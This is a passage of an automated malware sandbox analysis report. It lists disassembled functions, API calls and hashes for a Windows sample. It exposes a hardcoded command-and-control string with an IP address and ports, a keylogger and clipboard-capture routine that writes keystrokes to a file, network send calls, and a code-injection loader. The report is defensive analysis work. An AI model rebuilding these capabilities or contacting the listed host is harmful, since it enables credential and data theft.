                                                                                                                              • Part of subcall function 03621280: DeleteCriticalSection.KERNEL32(00000000,0362D3E6,03646624,?,?,0362D3E6,?,?,?,?,03645A40,00000000), ref: 036212A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1116298128-0
                                                                                                                            • Opcode ID: 682e387d9fed1deee8b19fa4e4f5a0e31c2dbe8b0b2bedb829cb80423360cd6a
                                                                                                                            • Instruction ID: 7a42ec30622ca85fd012c6318a9b5e0f8e9e9246526c1c95b4f208ee8ea5289d
                                                                                                                            • Opcode Fuzzy Hash: 682e387d9fed1deee8b19fa4e4f5a0e31c2dbe8b0b2bedb829cb80423360cd6a
                                                                                                                            • Instruction Fuzzy Hash: B40168B4A00B508BC320DF6A9844A47FAF8BB99700B114A1EE69ACAA10D370A105CF65
                                                                                                                            Function 0362E480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,0362DF10,00000000,00000000,00000000), ref: 0362E49B
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,03631168,?,?,?,?,?,?,03646298,0000000C,03631210,?), ref: 0362E4A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateObjectSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1891408510-0
                                                                                                                            • Opcode ID: a200bd976cf252ff9d2aa44fc532ccf311566d73516277990a39457629dfeb81
                                                                                                                            • Instruction ID: 74f28f666eb1dfc4192c6bb4fb7a19ecfab8462c6132f3eb51dee9d8fc4b989c
                                                                                                                            • Opcode Fuzzy Hash: a200bd976cf252ff9d2aa44fc532ccf311566d73516277990a39457629dfeb81
                                                                                                                            • Instruction Fuzzy Hash: 7CE012B5584719BFDF10EB54AC94E763B9CD704370B215635B920D274CD63298808A75
                                                                                                                            Function 02C37175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 02C37181
                                                                                                                              • Part of subcall function 02C3990F: __getptd_noexit.LIBCMT ref: 02C39912
                                                                                                                              • Part of subcall function 02C3990F: __amsg_exit.LIBCMT ref: 02C3991F
                                                                                                                              • Part of subcall function 02C37156: __getptd_noexit.LIBCMT ref: 02C3715B
                                                                                                                              • Part of subcall function 02C37156: __freeptd.LIBCMT ref: 02C37165
                                                                                                                              • Part of subcall function 02C37156: ExitThread.KERNEL32 ref: 02C3716E
                                                                                                                            • __XcptFilter.LIBCMT ref: 02C371A2
                                                                                                                              • Part of subcall function 02C39C41: __getptd_noexit.LIBCMT ref: 02C39C47
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418257734-0
                                                                                                                            • Opcode ID: 9d4daf30411320e0dd4f6c9324e566922b6aa7ef58f5de32197cf16706991664
                                                                                                                            • Instruction ID: 439295be021a2152cd0f13f36671c90befdd6d8df2e549c2bcfc9935481d908e
                                                                                                                            • Opcode Fuzzy Hash: 9d4daf30411320e0dd4f6c9324e566922b6aa7ef58f5de32197cf16706991664
                                                                                                                            • Instruction Fuzzy Hash: 65E0ECB19006049FE709ABA0D945E6E7776AF04711F200848E1025B2A1CAB5A944EF24
                                                                                                                            Function 0362F983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 0362F98F
                                                                                                                              • Part of subcall function 03633E5B: __getptd_noexit.LIBCMT ref: 03633E5E
                                                                                                                              • Part of subcall function 03633E5B: __amsg_exit.LIBCMT ref: 03633E6B
                                                                                                                              • Part of subcall function 0362F964: __getptd_noexit.LIBCMT ref: 0362F969
                                                                                                                              • Part of subcall function 0362F964: __freeptd.LIBCMT ref: 0362F973
                                                                                                                              • Part of subcall function 0362F964: ExitThread.KERNEL32 ref: 0362F97C
                                                                                                                            • __XcptFilter.LIBCMT ref: 0362F9B0
                                                                                                                              • Part of subcall function 0363418F: __getptd_noexit.LIBCMT ref: 03634195
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 418257734-0
                                                                                                                            • Opcode ID: e33b226e12e71fe5387ac5cd1d53afb31bd8aa4e5b13b2d9005ee8baf976732d
                                                                                                                            • Instruction ID: cac38fbbacd8f4a08c979673950cb47cd9c1dc4596b4d266155153c6249a6162
                                                                                                                            • Opcode Fuzzy Hash: e33b226e12e71fe5387ac5cd1d53afb31bd8aa4e5b13b2d9005ee8baf976732d
                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB9900701EFEB18EBA1D905E7E7B75AF46601F20014DE1026F2A1CF799940DB29
                                                                                                                            Function 03636403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __lock.LIBCMT ref: 0363641B
                                                                                                                              • Part of subcall function 03638E5B: __mtinitlocknum.LIBCMT ref: 03638E71
                                                                                                                              • Part of subcall function 03638E5B: __amsg_exit.LIBCMT ref: 03638E7D
                                                                                                                              • Part of subcall function 03638E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03633F06,0000000D,03646340,00000008,03633FFF,00000000,?,036310F0,00000000,03646278,00000008,03631155,?), ref: 03638E85
                                                                                                                            • __tzset_nolock.LIBCMT ref: 0363642C
                                                                                                                              • Part of subcall function 03635D22: __lock.LIBCMT ref: 03635D44
                                                                                                                              • Part of subcall function 03635D22: ____lc_codepage_func.LIBCMT ref: 03635D8B
                                                                                                                              • Part of subcall function 03635D22: __getenv_helper_nolock.LIBCMT ref: 03635DAD
                                                                                                                              • Part of subcall function 03635D22: _free.LIBCMT ref: 03635DE4
                                                                                                                              • Part of subcall function 03635D22: _strlen.LIBCMT ref: 03635DEB
                                                                                                                              • Part of subcall function 03635D22: __malloc_crt.LIBCMT ref: 03635DF2
                                                                                                                              • Part of subcall function 03635D22: _strlen.LIBCMT ref: 03635E08
                                                                                                                              • Part of subcall function 03635D22: _strcpy_s.LIBCMT ref: 03635E16
                                                                                                                              • Part of subcall function 03635D22: __invoke_watson.LIBCMT ref: 03635E2B
                                                                                                                              • Part of subcall function 03635D22: _free.LIBCMT ref: 03635E3A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1828324828-0
                                                                                                                            • Opcode ID: 8819d76b5585b5fe6f4920a5b5bb8a44b1a3fd5e861b60085903b61ccf348a36
                                                                                                                            • Instruction ID: 898b8b745377b165d95f2916368c54f1b385d830dad6fe151ece46e335d455a1
                                                                                                                            • Opcode Fuzzy Hash: 8819d76b5585b5fe6f4920a5b5bb8a44b1a3fd5e861b60085903b61ccf348a36
                                                                                                                            • Instruction Fuzzy Hash: 84E0C238C42310E6C723FFE1E64264CB2206B83F21F90916DE4421B189CE708111C66B
                                                                                                                            Function 02C3474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(|p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:), ref: 02C34755
                                                                                                                              • Part of subcall function 02C33260: __wcsrev.LIBCMT ref: 02C50655
                                                                                                                            Strings
                                                                                                                            • |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:, xrefs: 02C34750
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsrevlstrlen
                                                                                                                            • String ID: |p1:118.107.44.219|o1:19091|t1:1|p2:118.107.44.219|o2:19092|t2:1|p3:118.107.44.219|o3:19093|t3:1|dd:1|cl:1|fz:
                                                                                                                            • API String ID: 4062721203-291094236
                                                                                                                            • Opcode ID: 2d8d34a2e1ee15b0f11d357fc6ba471f01cabbd8cfb3521877402e88e66a30b5
                                                                                                                            • Instruction ID: 7de60414d6b34447b7031d1bf14a7e6288458598b612279001ec6df3a91e5731
                                                                                                                            • Opcode Fuzzy Hash: 2d8d34a2e1ee15b0f11d357fc6ba471f01cabbd8cfb3521877402e88e66a30b5
                                                                                                                            • Instruction Fuzzy Hash: 34C08CB6388218CFF60163D4901872E33A8EB72B25F904936E905C6402EA92CC5097F1
                                                                                                                            Function 03626EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegCloseKey.ADVAPI32(80000001,03626E9A), ref: 03626EC9
                                                                                                                            • RegCloseKey.ADVAPI32(75BF73E0), ref: 03626ED2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0
                                                                                                                            • Opcode ID: 4aec8f835890f0f8be9255da106e2662c438f2d77a73ba3d5e4ec6fcebac7769
                                                                                                                            • Instruction ID: 35f9415ac1f1be564bb617da2cc3434a4eb8102dcde16cc8ee1a7c83f8629ed9
                                                                                                                            • Opcode Fuzzy Hash: 4aec8f835890f0f8be9255da106e2662c438f2d77a73ba3d5e4ec6fcebac7769
                                                                                                                            • Instruction Fuzzy Hash: A8C04C72D0102857CB10E6A4ED4494977B85B4C510F1144C2A104A3118C634AD418F90
                                                                                                                            Function 02C3608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Open
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 71445658-0
                                                                                                                            • Opcode ID: 2ed9f0af205d358272387ad039bf3f40c52ad82f69b545427f57d68dd441a005
                                                                                                                            • Instruction ID: 5297b55a99eebe65c08724d2c2bb652917b88ee57558fb41fa64114ad038c7ba
                                                                                                                            • Opcode Fuzzy Hash: 2ed9f0af205d358272387ad039bf3f40c52ad82f69b545427f57d68dd441a005
                                                                                                                            • Instruction Fuzzy Hash: 81E09278D08205EBCB15CA41E684BFF73F56BA0744F60458DD0066B484DB783B04CAD5
                                                                                                                            Function 02C35E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3660427363-0
                                                                                                                            • Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                            • Instruction ID: 9fa30df058d8d89981ad1c0164ff269d24df4988365f3a6339d3aeff2b6c14df
                                                                                                                            • Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
                                                                                                                            • Instruction Fuzzy Hash: E6C08C20C4CB9CE5C03258531D09A7BB2E04B88225F1008FFE80B3AC80ACF52680C6EA
                                                                                                                            Function 02C34274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 02C50693
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: 640a7b4604415ed3fcada077ca00375e9fa599d6961303afc37a4510ecb50558
                                                                                                                            • Instruction ID: 1fa2e6ab13cc23dfd6c610c1602a26604dc4335b6215505eb9e1104b1c59c231
                                                                                                                            • Opcode Fuzzy Hash: 640a7b4604415ed3fcada077ca00375e9fa599d6961303afc37a4510ecb50558
                                                                                                                            • Instruction Fuzzy Hash: 4CC04C1868C224E9F53515432D06B2626443B6AF25F604B27FA23AD8C24D904480C597
                                                                                                                            Function 02C360DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C4FAB1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2882836952-0
                                                                                                                            • Opcode ID: 7b24d334fcacd171fe89243346abc0b33ea11820977dd458f62347b5ddacf395
                                                                                                                            • Instruction ID: ff9d8ef87417f517c434e6068654fb077f3c9c8ee036649d144d6bdf751ec3a9
                                                                                                                            • Opcode Fuzzy Hash: 7b24d334fcacd171fe89243346abc0b33ea11820977dd458f62347b5ddacf395
                                                                                                                            • Instruction Fuzzy Hash: 2DD012B8504500CBD310AB51C48470BB2E2BF84304F20CA19C85E92E10CB38E841CA91
                                                                                                                            Function 02C4F63D Relevance: 1.5, APIs: 1, Instructions: 3networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: send
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2809346765-0
                                                                                                                            • Opcode ID: e02f8fa062b9588f9a30bfaac54f852412cf425d1d9617c7b0869e55d23016a8
                                                                                                                            • Instruction ID: 0582bb437fd15e7f06b59d407bc460fd42906c1bc1feec2dbfce1d1b5ce5bd50
                                                                                                                            • Opcode Fuzzy Hash: e02f8fa062b9588f9a30bfaac54f852412cf425d1d9617c7b0869e55d23016a8
                                                                                                                            • Instruction Fuzzy Hash: C590022C7C4101AB5210092269487573694551468134419189803C0400DA108250D554
                                                                                                                            Function 02C35EB2 Relevance: 1.3, APIs: 1, Instructions: 15sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32 ref: 02C35EB2
                                                                                                                              • Part of subcall function 02C36F17: _malloc.LIBCMT ref: 02C36F31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4135787709.0000000002C31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4135760827.0000000002C30000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4135972219.0000000002C45000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136032011.0000000002C49000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136083434.0000000002C4F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.4136123182.0000000002C51000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_2c30000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 617756273-0
                                                                                                                            • Opcode ID: f2eeb3c9a3c3a51a412f6f5aad4c1f2799a66fa5bebb21c937ec46e7c38a63cd
                                                                                                                            • Instruction ID: ae9cf8a38fff406693659b1cbf2d42371831119d34b79f1c4385950f5bd1e1bf
                                                                                                                            • Opcode Fuzzy Hash: f2eeb3c9a3c3a51a412f6f5aad4c1f2799a66fa5bebb21c937ec46e7c38a63cd
                                                                                                                            • Instruction Fuzzy Hash: C0D022A2D04202DBE7A02EA104C863F61A22794384FA4853DCA0BC2800DE6A5E54CBD2

                                                                                                                            Non-executed Functions

                                                                                                                            Function 0362E850 Relevance: 72.1, APIs: 36, Strings: 5, Instructions: 311stringfilesynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0362E8A9
                                                                                                                            • Sleep.KERNEL32(00000001,?,?,?,0362604D), ref: 0362E8B3
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E8BF
                                                                                                                            • GetTickCount.KERNEL32 ref: 0362E8D2
                                                                                                                            • InterlockedExchange.KERNEL32(03651F08,00000000), ref: 0362E8DA
                                                                                                                            • OpenClipboard.USER32(00000000), ref: 0362E8E2
                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0362E8EA
                                                                                                                            • GlobalSize.KERNEL32(00000000), ref: 0362E8FB
                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0362E90C
                                                                                                                            • wsprintfW.USER32 ref: 0362E985
                                                                                                                            • _memset.LIBCMT ref: 0362E9A3
                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0362E9AC
                                                                                                                            • CloseClipboard.USER32 ref: 0362E9B2
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0362E9CA
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0362E9E4
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362EA02
                                                                                                                            • lstrlenW.KERNEL32(03645B48,?,00000000), ref: 0362EA16
                                                                                                                            • WriteFile.KERNEL32(00000000,03645B48,00000000), ref: 0362EA25
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362EA2C
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362EA38
                                                                                                                            • GetKeyState.USER32(00000014), ref: 0362EABC
                                                                                                                            • lstrlenW.KERNEL32(0364B4A8), ref: 0362EB0B
                                                                                                                            • wsprintfW.USER32 ref: 0362EB1D
                                                                                                                            • lstrlenW.KERNEL32(0364B4D0), ref: 0362EB3E
                                                                                                                            • lstrlenW.KERNEL32(0364B4D0), ref: 0362EB61
                                                                                                                            • wsprintfW.USER32 ref: 0362EB7F
                                                                                                                            • wsprintfW.USER32 ref: 0362EB95
                                                                                                                            • wsprintfW.USER32 ref: 0362EBBF
                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 0362EC0B
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0362EC21
                                                                                                                            • CreateFileW.KERNEL32(03650D80,40000000,00000002,00000000,00000004,00000002,00000000), ref: 0362EC3B
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0362EC59
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00000000), ref: 0362EC69
                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0362EC74
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0362EC7B
                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 0362EC88
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.4138706981.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.4138706981.0000000003654000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_3620000_HGwpjJUqhW.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrlen$wsprintf$ClipboardCloseGlobal$CountCreateHandleMutexObjectPointerReleaseSingleTickWaitWrite_memset$DataExchangeInterlockedLockOpenSizeSleepStateUnlock
                                                                                                                            • String ID: [$%s%s$%s%s$%s%s$[esc]
                                                                                                                            • API String ID: 1637302245-2373594894
                                                                                                                            • Opcode ID: 5e0dfcae186ac3a25b9bf0086d27fe3900f2549e0591a75615e7f9819c0331f9
                                                                                                                            • Instruction ID: 7cba60f5a7126939042cbc3ca577609c0528c72a2a59f950b89a705659d7d5fb
                                                                                                                            • Opcode Fuzzy Hash: 5e0dfcae186ac3a25b9bf0086d27fe3900f2549e0591a75615e7f9819c0331f9
                                                                                                                            • Instruction Fuzzy Hash: C9C12278A00711AFD724EF64DD48FAA7BB8BB09700F154A68F25AC7288D7B19580CF64
                                                                                                                            Function 036277E0 Relevance: 68.5, APIs: 30, Strings: 9, Instructions: 240libraryloaderinjectionCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 03627804
                                                                                                                            • _memset.LIBCMT ref: 03627850
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,000000FF), ref: 03627864
                                                                                                                              • Part of subcall function 03628720: _vswprintf_s.LIBCMT ref: 03628731
                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,74DF0630,?,74DF0F00), ref: 03627893
